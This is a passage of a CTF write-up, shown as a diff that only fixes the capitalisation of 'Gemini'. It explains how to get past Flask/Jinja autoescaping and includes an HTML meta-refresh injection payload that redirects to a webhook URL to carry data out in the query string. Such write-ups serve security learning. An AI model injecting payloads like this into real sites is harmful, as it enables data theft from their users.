banana0972/vlog/docs/Ctfs/SieberrCtf Finals 2025.md

 ```html
 <meta http-equiv="refresh" content=\'0; url=https://webhook?x=
 ```
 But how would we get that?
 I remembered jinja had something where you could mark it as [safe](https://jinja.palletsprojects.com/en/stable/templates/#working-with-automatic-escaping).
-I was wondering if passing something that wasn't a string to `title` could somehow get it marked as safe when stringified, but a quick gemini chat told me it wasn't possible.
+I was wondering if passing something that wasn't a string to `title` could somehow get it marked as safe when stringified, but a quick Gemini chat told me it wasn't possible.
 But hold up, what and when does Flask consider something is safe?
 ![[Pasted image 20250801222422.png]]
-(Thanks gemini)
+(Thanks Gemini)
 Checking the [docs](https://flask.palletsprojects.com/en/stable/templating/#jinja-setup), flask only escapes specific files:
 > "autoescaping is enabled for all templates ending in .html, .htm, .xml, .xhtml, as well as .svg when using render_template()."